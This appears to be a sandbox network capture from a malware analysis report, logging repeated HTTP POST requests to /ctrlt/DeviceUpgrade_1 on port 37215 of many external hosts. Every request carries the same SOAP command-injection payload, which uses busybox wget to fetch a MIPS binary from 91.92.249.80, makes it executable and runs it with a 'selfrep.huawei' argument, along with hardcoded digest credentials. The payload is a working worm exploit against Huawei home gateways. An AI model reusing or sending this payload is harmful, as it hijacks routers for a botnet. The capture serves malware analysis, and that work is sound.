                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1875192.168.2.2349270157.79.191.22337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.553072929 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1876192.168.2.235105241.238.124.22537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.553100109 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1877192.168.2.2359014197.229.136.3437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.553265095 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1878192.168.2.235162641.33.247.4637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.553318024 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1879192.168.2.2343524157.196.255.15037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.553369999 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1880192.168.2.235619441.214.55.837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.553807020 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1881192.168.2.2345460197.165.152.23937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.553850889 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1882192.168.2.235516293.20.199.9837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.553911924 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1883192.168.2.2343728223.1.130.20937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.553951979 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1884192.168.2.2345968197.25.5.10637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.553961039 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
